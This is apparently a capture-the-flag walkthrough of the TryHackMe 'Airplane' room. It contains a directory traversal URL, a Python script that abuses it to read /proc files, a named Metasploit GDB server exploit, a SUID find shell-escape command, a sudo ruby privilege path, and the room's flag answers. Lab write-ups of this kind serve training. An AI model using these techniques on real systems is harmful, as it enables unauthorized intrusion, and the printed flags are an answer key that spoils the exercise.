We covered a CTF scenario where we started with nmap scanning followed by enumeration of the web application running on port 8000 where we discovered a directory traversal vulnerability allowing us to read the contents of sensitive files such as /etc/passwd. Using Python, we discovered the process name that is listening on port 6048 discovered during nmap scan. The application name was GDB server and we used Metasploit to exploit it and gain Meterpreter shell. Privilege escalation was achieved horizontally first by looking for binaries with SUID bit set and then to root using ruby. This was part of TryHackMe Airplane CTF room.
Offensive Security Certified Professional Study Notes
Web Application Enumeration
We know from the scanning phase that the webserver runs on port 8000 so by visiting and testing the page we discover it’s vulnerability to directory traversal.
If you attempt to use the below URL in the request, you will be able to view the password file on Linux:
http://airplane.thm:8000/page.html=../../../etc/passwd
By visiting /proc/net/tcp, we will get the list of active network connections. By using this reference, we can match the columns with their values to extract insights such as the local port, local address and remote port.
We find that port 6048 → hex (17A0) also has an active unknown service so we set sights to find out what’s behind it.
Using Python to Uncover the Hidden Process
Below is the python script used to reveal the name of the process listening on port 6048
import requests
def read_file(base_url, path):
file_url = f"{base_url}/?page=../../../../{path}"
try:
response = requests.get(file_url)
if response.status_code == 200:
return response.text
else:
return None
except Exception as e:
print(f"Error reading {path}: {e}")
return None
def find_pid_by_port(base_url, port):
for pid in range(1, 5000): # Adjust the range based on the expected number of PIDs
cmdline_path = f"proc/{pid}/cmdline"
cmdline = read_file(base_url, cmdline_path)
if cmdline:
if str(port) in cmdline:
return pid
return None
# Example usage
base_url = 'http://airplane.thm:8000'
port = '6048'
pid = find_pid_by_port(base_url, port)
if pid:
cmdline = read_file(base_url, f"proc/{pid}/cmdline")
status = read_file(base_url, f"proc/{pid}/status")
print(f'PID using port {port}: {pid}')
print(f'Command line: {cmdline}')
print(f'Status: {status}')
else:
print(f'No process found using port {port}')
The name of the process is: GDB server
Exploitation with Metasploit
We used the module exploit multi/gdb/gdb_server_exec to perform the exploitation and get Meterpreter shell.
Linux Privilege Escalation
First we performed horizontal privilege escalation from user hudson to user carlos by looking for binaries with SUID bit set.
find / -user carlos -perm -u=s 2>/dev/null
Then we run
/usr/bin/find . -exec /bin/sh -p \; -quit
Later down the road, you can run the below command:
sudo -l
And you will find that you can run /usr/bin/ruby /root/*.rb as sudo.
Check out the video below for detailed explanation.
Room Answers | TryHackMe Airplane CTF
What is user.txt
eebfca2ca5a2b8a56c46c781aeea7562
What is root.txt
190dcbeb688ce5fe029f26a1e5fce002
Finally, completing the TryHackMe “Airplane” task allowed for a practical investigation of cybersecurity methods. Every stage of the penetration testing process, from using Nmap for preliminary reconnaissance to leveraging SUID misconfigurations and Local File Inclusion (LFI) vulnerabilities, provided insightful learning experiences. Through escalation of privileges to the carlos account and, eventually, root.txt access, I reaffirmed the importance of meticulous exploitation and complete system study.
Video Walkthrough | TryHackMe Airplane CTF
